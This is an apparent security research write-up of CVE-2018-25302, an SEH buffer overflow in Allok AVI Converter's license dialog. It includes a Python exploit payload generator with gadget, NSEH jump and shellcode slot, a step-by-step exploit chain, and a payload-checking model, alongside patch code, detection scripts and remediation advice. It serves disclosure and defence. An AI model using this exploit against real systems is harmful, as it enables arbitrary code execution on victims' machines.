CVE Analysis 2026-04-29 · 8 min read

CVE-2018-25302: SEH Buffer Overflow in Allok AVI Converter 4.0.1217

Allok AVI to DVD SVCD VCD Converter 4.0.1217 contains a classic SEH-based stack buffer overflow in the license registration dialog. A crafted string in the License Name field yields arbitrary code execution in the context of the user running the application.

Tags: buffer-overflow · seh-bypass · arbitrary-code-execution · local-privilege-escalation · converter-application

Vulnerability Overview

CVE-2018-25302 is a structured exception handling (SEH) based stack buffer overflow in Allok AVI to DVD SVCD VCD Converter 4.0.1217, a Windows multimedia transcoding utility. The vulnerability exists in the license registration routine: when a user opens the registration dialog, pastes an oversized string into the License Name field, and clicks Register, the application copies attacker-controlled input into a fixed-size stack buffer without bounds checking. The overflow corrupts the SEH chain on the stack, and a carefully positioned POP POP RET gadget pivots execution into attacker-supplied shellcode. CVSS score is 7.8 HIGH (local vector, no privileges required, user interaction: click Register).

Root cause: The license registration handler passes attacker-controlled input directly to an unbounded lstrcpyA (or equivalent) into a fixed-size stack buffer, overwriting the SEH chain with no length validation whatsoever.

Affected Component

The vulnerable code path lives inside the main application binary, AVItoDVD.exe, within the dialog procedure for the registration window. The specific handler is the WM_COMMAND branch triggered by the Register button (IDC_REGISTER). No external DLL is implicated — the overflow occurs entirely within the application's own stack frame during inline license string processing.

  • Binary: AVItoDVD.exe, version 4.0.1217
  • Compiler artifact: MSVC, linked without /SAFESEH, without /DYNAMICBASE (no ASLR), without /NXCOMPAT (no DEP opt-in) and without /GS stack cookies
  • Attack surface: Local — attacker must supply input to the registration dialog (clipboard paste or direct keyboard input)

Root Cause Analysis

The registration dialog procedure reads the contents of the License Name edit control into a stack buffer of approximately 512 bytes. That GetWindowTextA call is bounded by its nMaxCount argument, so it is not itself the bug: the retrieved string is then handed to a secondary routine that copies it into a smaller stack buffer with no length check at all. Decompiled pseudocode reconstructed from the binary:


// Dialog procedure: RegDlgProc (reconstructed)
// Triggered by WM_COMMAND when IDC_REGISTER button is pressed
INT_PTR CALLBACK RegDlgProc(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
{
    char license_name[512];   // stack-allocated, fixed size
    char license_key[512];    // immediately adjacent on stack
    char validate_buf[128];   // scratch buffer

    if (msg == WM_COMMAND && LOWORD(wParam) == IDC_REGISTER) {
        // GetWindowTextA itself is bounded: it writes at most nMaxCount-1
        //      characters (511) plus a terminating NUL into license_name.
        GetWindowTextA(GetDlgItem(hDlg, IDC_LICENSE_NAME),
                       license_name, sizeof(license_name));

        // BUG: the up-to-511-byte string is handed to a routine that copies
        //      it into a 256-byte stack buffer with no length check at all.
        ProcessLicenseName(license_name, validate_buf);  // <-- overflow here
        ...
    }
}

// ProcessLicenseName (reconstructed)
void ProcessLicenseName(const char *src, char *out)
{
    char local_buf[256];
    // BUG: no bounds check — src up to 512 bytes copied into 256-byte local_buf
    lstrcpyA(local_buf, src);   // stack buffer overflow
    // SEH chain on stack is now corrupted
    ...
}

The two-stage copy is the critical detail: GetWindowTextA with nMaxCount=512 acts as a partial guardrail (at most 511 characters plus the terminator reach license_name), but ProcessLicenseName then copies that string into a 256-byte local_buf, overflowing by up to 256 bytes, more than enough to reach the SEH record 268 bytes past the start of the buffer. The same cap also bounds the attacker: under this reconstruction no more than 511 bytes ever reach local_buf, so the entire payload, shellcode included, has to fit in that space.

Memory Layout


STACK LAYOUT INSIDE ProcessLicenseName (before overflow, reconstructed):
  [ESP+0x000]  saved regs / local variables
  [ESP+0x004]  local_buf[256]       <- lstrcpyA destination
  [ESP+0x104]  padding / canary gap (none: no /GS)
  [ESP+0x108]  saved EBP
  [ESP+0x10C]  saved EIP (return address)
  [ESP+0x110]  NSEH record          <- next SEH frame pointer (caller's frame)
  [ESP+0x114]  SEH handler pointer  <- address of exception handler
  [ESP+0x118]  ... rest of caller frame ...

STACK LAYOUT AFTER OVERFLOW (up to 511 bytes + NUL copied into the 256-byte buffer):
  [ESP+0x004]  [AAAA...AAAA]        <- 256 bytes of junk fill local_buf
  [ESP+0x104]  [AAAA...AAAA]        <- overflow begins, clobbers the gap
  [ESP+0x108]  [0x41414141]         <- saved EBP overwritten
  [ESP+0x10C]  [0x41414141]         <- return address overwritten
  [ESP+0x110]  [\xeb\x06\x90\x90]   <- NSEH: short JMP +6 over the handler dword
  [ESP+0x114]  [&PPR gadget]        <- SEH: example address 0x004A1B3C
  [ESP+0x118]  [NOP sled + shellcode]

EXPLOIT PAYLOAD STRUCTURE (must fit in the 511 bytes GetWindowTextA returns):
  [ junk      ] 268 bytes  0x41 fill  (pad to NSEH offset)
  [ NSEH      ] 4 bytes    \xeb\x06\x90\x90  (JMP +6 over SEH dword)
  [ SEH       ] 4 bytes    &PPR gadget (e.g. 0x004XXXXX inside AVItoDVD.exe)
  [ nop sled  ] 16 bytes   \x90 * 16
  [ shellcode ] remaining space: 219 bytes under the 512-byte GetWindowTextA cap reconstructed above (calc.exe / small reverse shell)

Exploitation Mechanics

SEH exploitation on a non-SafeSEH, non-ASLR binary is straightforward. The attacker must locate a POP reg / POP reg / RET gadget within a module loaded without SafeSEH; the application's own image qualifies. Pattern-offset calculation confirms the exact offset to NSEH at 268 bytes. One caveat the layout above glosses over: an address in the 0x004XXXXX range has a 0x00 high byte, and both clipboard text and lstrcpyA stop at the first NUL, so with such a gadget nothing after the handler dword is ever copied. The 0x00 can only ever be the last byte of the delivered string; a NUL-free gadget from another non-SafeSEH module, or shellcode placed before NSEH with a backward jump, avoids the problem.


#!/usr/bin/env python3
# CVE-2018-25302 — Allok AVI to DVD SVCD VCD Converter 4.0.1217
# SEH stack buffer overflow — PoC payload generator
# For research/educational purposes only.

import struct

# Gadget: POP ECX / POP ECX / RET inside AVItoDVD.exe (no ASLR, no SafeSEH)
# Locate with: !mona seh -cm safeseh=off
# Caveat: a 0x004XXXXX address has a 0x00 high byte, and lstrcpyA stops at
# the first NUL, so nothing after SEH is copied with such a gadget. Use a
# NUL-free gadget from another non-SafeSEH module, or place the shellcode
# before NSEH and jump backwards.
PPR_GADGET = 0x004A1B3C   # example address — verify against your build

JUNK_SIZE  = 268           # bytes to reach NSEH on stack (pattern_offset)

# \xeb\x06 = JMP SHORT +6: skips the two NOPs and the 4-byte SEH handler dword
NSEH       = b"\xeb\x06\x90\x90"
SEH        = struct.pack("<I", PPR_GADGET)   # little-endian handler address
NOP_SLED   = b"\x90" * 16

# Placeholder: INT3 breakpoints prove control of EIP under a debugger.
# Replace with msfvenom output (calc.exe / reverse shell); \x00 is a bad char.
SHELLCODE  = b"\xcc" * 4

payload = b"A" * JUNK_SIZE + NSEH + SEH + NOP_SLED + SHELLCODE

# Write as latin-1 text so it can be copied into the License Name field.
with open("payload.txt", "w", encoding="latin-1", newline="") as f:
    f.write(payload.decode("latin-1"))
print(f"wrote {len(payload)} bytes to payload.txt")

EXPLOIT CHAIN:
1. Attacker generates the payload (268 junk + NSEH JMP + SEH PPR gadget + NOP sled + shellcode)
2. Payload is delivered as text (the Python script writes a latin-1 string for the clipboard)
3. Victim opens Allok AVI Converter → Help → Register (or the trial nag dialog)
4. Victim pastes the string into the "License Name" field (Ctrl+V)
5. Victim clicks "Register" → WM_COMMAND dispatched to RegDlgProc
6. RegDlgProc calls ProcessLicenseName(license_name, validate_buf)
7. lstrcpyA copies the up-to-511-byte string into the 256-byte local_buf → saved EBP, return address and SEH record overwritten
8. The function returns into 0x41414141 (or a later pointer use faults) → access violation
9. Windows walks the SEH chain → finds the attacker-controlled handler at [ESP+0x114]
10. The exception dispatcher calls the handler → CPU at the PPR gadget: POP / POP / RET
11. The two POPs discard the return address and the first handler argument; RET pops the second argument, the pointer to the EXCEPTION_REGISTRATION_RECORD, i.e. the NSEH bytes themselves
12. \xeb\x06 JMP skips the handler dword → lands on the NOP sled → shellcode executes
13. Arbitrary code runs in the context of the logged-in user
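To make the two constraints above concrete (the two-stage copy that caps the delivered string, and the NUL byte in a 0x004XXXXX gadget that ends the copy early), here is an added example that models the reconstructed copy chain in Python and runs a candidate payload through it. It is not code from the original page or from the vendor: the 512/256-byte buffers, the 268-byte offset and the 0x004A1B3C gadget are the article's reconstructed values, the INT3 stand-in shellcode is constructed for the demo, and 0x10011A2B is a made-up NUL-free address standing in for a gadget in some non-SafeSEH DLL.

```python
"""Model of the reconstructed copy chain and a structural check of an SEH payload.
Constructed values throughout: the 512/256-byte buffers and the 268-byte NSEH
offset are the article's reconstruction, 0x004A1B3C is the article's example
gadget and 0x10011A2B is a hypothetical NUL-free gadget address."""
import struct

GETWINDOWTEXT_CAP = 512   # nMaxCount passed to GetWindowTextA (reconstructed)
LOCAL_BUF_SIZE = 256      # local_buf in ProcessLicenseName (reconstructed)
NSEH_OFFSET = 268         # local_buf start -> NSEH (pattern_offset result)
SLED_SIZE = 16


def get_window_text_a(src: bytes, n_max: int) -> bytes:
    """GetWindowTextA copies at most n_max-1 characters and appends a NUL."""
    return src[: n_max - 1] + b"\x00"


def lstrcpy_a(src: bytes) -> bytes:
    """lstrcpyA copies up to and including the first NUL, with no length check.
    Returns exactly the bytes that land in the destination buffer."""
    return src[: src.index(b"\x00") + 1]


def build_payload(ppr_gadget: int, shellcode: bytes) -> bytes:
    """junk | NSEH (jmp short +6) | SEH (gadget) | NOP sled | shellcode"""
    nseh = b"\xeb\x06\x90\x90"
    seh = struct.pack("<I", ppr_gadget)
    return b"A" * NSEH_OFFSET + nseh + seh + b"\x90" * SLED_SIZE + shellcode


def short_jmp_target(nseh: bytes):
    """Landing point of a 2-byte jmp short at the start of NSEH, relative to
    NSEH (8 means the first byte after the handler dword), or None."""
    if len(nseh) < 2 or nseh[0] != 0xEB:
        return None
    return 2 + struct.unpack("<b", nseh[1:2])[0]


def check_payload(payload: bytes) -> dict:
    """Push the payload through GetWindowTextA -> lstrcpyA and report what survives."""
    copied = lstrcpy_a(get_window_text_a(payload, GETWINDOWTEXT_CAP))
    handler_end = NSEH_OFFSET + 8
    shellcode_start = handler_end + SLED_SIZE
    report = {
        "nul_offsets": [i for i, b in enumerate(payload) if b == 0],
        "copied_len": len(copied),                       # includes terminator
        "overflow_bytes": max(0, len(copied) - LOCAL_BUF_SIZE),
        "handler_written": len(copied) >= handler_end,
        "nseh_jmp_target": None,
        # shellcode bytes that actually reach the stack (terminator not counted)
        "shellcode_bytes_delivered": max(0, len(copied) - 1 - shellcode_start),
    }
    if report["handler_written"]:
        report["nseh_jmp_target"] = short_jmp_target(copied[NSEH_OFFSET:NSEH_OFFSET + 4])
    return report


if __name__ == "__main__":
    stand_in = b"\xcc" * 230   # placeholder shellcode, constructed for the demo
    for label, gadget in (("article gadget", 0x004A1B3C), ("NUL-free gadget", 0x10011A2B)):
        print(label, hex(gadget), check_payload(build_payload(gadget, stand_in)))
```

With the article's gadget the report shows the handler dword fully written (its 0x00 high byte is the string terminator) but zero shellcode bytes delivered, so the jump at NSEH would land on whatever happened to be on the stack. With a NUL-free gadget the whole 511-byte window is copied and 219 bytes remain for shellcode after the sled.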

Patch Analysis

No official patch was released by the vendor. The application appears abandoned. The correct fix requires two independent changes: validate length before the secondary copy, and compile with modern mitigations enabled.


// BEFORE (vulnerable — reconstructed):
void ProcessLicenseName(const char *src, char *out)
{
    char local_buf[256];
    lstrcpyA(local_buf, src);   // unbounded copy, no length check
    // ... process local_buf
}

// AFTER (corrected):
void ProcessLicenseName(const char *src, char *out)
{
    char local_buf[256];
    // Validate before copy; reject inputs exceeding buffer capacity
    if (lstrlenA(src) >= sizeof(local_buf)) {
        MessageBoxA(NULL, "License name too long.", "Error", MB_ICONERROR);
        return;
    }
    lstrcpynA(local_buf, src, sizeof(local_buf));   // length-limited copy
    // ... process local_buf
}

// CALLER (RegDlgProc) — additional fix:
// GetWindowText nMaxCount should match the smallest downstream buffer,
// not the caller's own buffer size:
GetWindowTextA(GetDlgItem(hDlg, IDC_LICENSE_NAME),
               license_name,
               256);  // match ProcessLicenseName's local_buf size
               // was: sizeof(license_name) = 512 — masked the real limit

Compiler-level mitigations that would have blocked or significantly raised the exploitation bar:

  • /GS (stack cookies) — would detect overwrite of return address before RET, generating a fatal exception prior to exploitation. Does not protect SEH by itself.
  • /SAFESEH — would cause Windows to reject any SEH handler address not registered in the image's SafeSEH table, breaking the PPR gadget pivot entirely.
  • /DYNAMICBASE (ASLR) — randomizes the image base, making static PPR gadget addresses unreliable without a separate info-leak.
  • /NXCOMPAT (DEP) — would require ROP rather than direct shellcode injection, substantially increasing exploit complexity.

Detection and Indicators

Detection is limited: the vulnerability requires local input to a GUI dialog and, when exploitation fails, manifests only as an application crash. Indicators to monitor:

  • Process anomaly: AVItoDVD.exe spawning unexpected child processes (cmd.exe, powershell.exe, or anything that opens a network connection); a transcoder has no reason to do so
  • Crash telemetry: Windows Error Reporting entries for AVItoDVD.exe with exception code 0xC0000005 (access violation) and a faulting address of 0x41414141 or another repeated fill byte, the mark of a failed or test overflow
  • Stack signature: in a dump, an SEH record whose handler points at a POP POP RET sequence in a non-SafeSEH module rather than a registered handler, whose next pointer is not a stack address, and which sits among 0x41414141 dwords
  • Process lineage: opening the registration dialog leaves no registry trace by itself, so watch for AVItoDVD.exe started from unusual parent processes (browser, mail client, Office) in combination with the indicators above

CRASH SIGNATURE (WinDbg, values from the reconstruction above):
(xxx.yyy): Access violation - code c0000005 (first chance)
eax=41414141 ebx=41414141 ecx=41414141 edx=41414141 esi=41414141 edi=41414141
eip=41414141 esp=0012e3a0 ebp=41414141 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202

0:000> !exchain
0012e4b0: AVItoDVD+0xa1b3c (004a1b3c)   <- SEH handler: example PPR gadget
Invalid exception stack at 909006eb      <- NSEH overwritten with \xeb\x06\x90\x90
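The indicators above can be checked mechanically. The following is an added example, not part of the original write-up, that scans a WinDbg transcript for the register fill pattern and for an SEH record whose next pointer is not a stack address and decodes as a short jump. The transcript is constructed from the crash signature above, and the 0x00400000 to 0x004FFFFF image range is an assumption, not a value read from AVItoDVD.exe.

```python
"""Scan a WinDbg crash transcript for the SEH-overwrite signature.
The sample transcript is constructed from the article's crash signature; the
module range is an assumed, non-ASLR image range for AVItoDVD.exe."""
import re
import struct

FILL = 0x41414141                        # the 0x41 ('A') junk fill used by the PoC
MODULE_RANGE = (0x00400000, 0x00500000)  # assumed image range of AVItoDVD.exe

SAMPLE_CRASH = """\
(xxx.yyy): Access violation - code c0000005 (first chance)
eax=41414141 ebx=41414141 ecx=41414141 edx=41414141 esi=41414141 edi=41414141
eip=41414141 esp=0012e3a0 ebp=41414141 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
0:000> !exchain
0012e4b0: AVItoDVD+0xa1b3c (004a1b3c)
Invalid exception stack at 909006eb
"""

REG_RE = re.compile(r"\b(eax|ebx|ecx|edx|esi|edi|ebp|esp|eip)=([0-9a-f]{8})\b")
# "<record>: symbol (handler)" or "<record>: <handler>" lines of !exchain
EXCHAIN_RE = re.compile(r"^([0-9a-f]{8}): (?:.*\()?([0-9a-f]{8})\)?$", re.M)
INVALID_RE = re.compile(r"Invalid exception stack at ([0-9a-f]{8})")


def parse_registers(text: str) -> dict:
    return {name: int(val, 16) for name, val in REG_RE.findall(text)}


def parse_exchain(text: str):
    """Return ([(record_addr, handler), ...], invalid_next_pointer_or_None)."""
    records = [(int(a, 16), int(h, 16)) for a, h in EXCHAIN_RE.findall(text)]
    m = INVALID_RE.search(text)
    return records, (int(m.group(1), 16) if m else None)


def short_jmp_displacement(dword: int):
    """If the low two bytes of a dword are EB xx, return xx as a signed displacement."""
    lo = struct.pack("<I", dword)[:2]
    if lo[0] != 0xEB:
        return None
    return struct.unpack("<b", lo[1:2])[0]


def analyze(text: str) -> list:
    """Return human-readable indicators found in the transcript."""
    regs = parse_registers(text)
    records, bad_next = parse_exchain(text)
    indicators = []
    filled = [r for r, v in regs.items() if v == FILL]
    if regs.get("eip") == FILL:
        indicators.append("eip holds the fill pattern: return address overwritten")
    if len(filled) >= 3:
        indicators.append(f"{len(filled)} registers hold 0x{FILL:08x}: {', '.join(filled)}")
    esp = regs.get("esp", 0)
    for rec, handler in records:
        if MODULE_RANGE[0] <= handler < MODULE_RANGE[1]:
            indicators.append(f"SEH record {rec:08x}: handler {handler:08x} lies in the "
                              "non-SafeSEH image; confirm it is a handler, not POP POP RET")
    if bad_next is not None:
        if abs(bad_next - esp) > 0x100000:   # more than 1 MiB from esp: not this stack
            indicators.append(f"next-SEH pointer {bad_next:08x} is not a stack address")
        disp = short_jmp_displacement(bad_next)
        if disp is not None:
            indicators.append(f"next-SEH pointer decodes as jmp short {disp:+d}: NSEH stub")
    return indicators


if __name__ == "__main__":
    for line in analyze(SAMPLE_CRASH):
        print("-", line)
```

The stack-address heuristic (within 1 MiB of esp) is deliberately loose; a legitimate chain's next pointers all sit on the same thread stack, whereas 0x909006eb is a pair of NOPs and a jump, which no sane handler registration would ever store there.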

Remediation

The vendor has not issued a patch. Mitigations in order of preference:

  1. Uninstall Allok AVI to DVD SVCD VCD Converter 4.0.1217. The software is end-of-life and has no vendor support path.
  2. If removal is not possible: restrict execution to isolated, unprivileged VMs with no network-accessible shares. Do not run under administrator-level accounts.
  3. Disable clipboard access in kiosk or shared workstation environments where the application must remain installed, to reduce the social-engineering delivery vector.
  4. Enable system-wide DEP via bcdedit /set nx AlwaysOn — this forces DEP enforcement even on applications not compiled with /NXCOMPAT, converting direct shellcode injection into a crash (though a sufficiently capable attacker would pivot to ROP).
  5. Apply Windows Defender Exploit Protection (EMET's successor; EMET itself reached end of life in 2018) to AVItoDVD.exe. Validate exception chains (SEHOP) refuses to dispatch through a chain whose next pointer no longer leads to the final ntdll handler, which is exactly what the NSEH overwrite produces, and mandatory ASLR plus DEP push any remaining path to a ROP chain against a randomized address space.
CypherByte Research · cypherbyte.io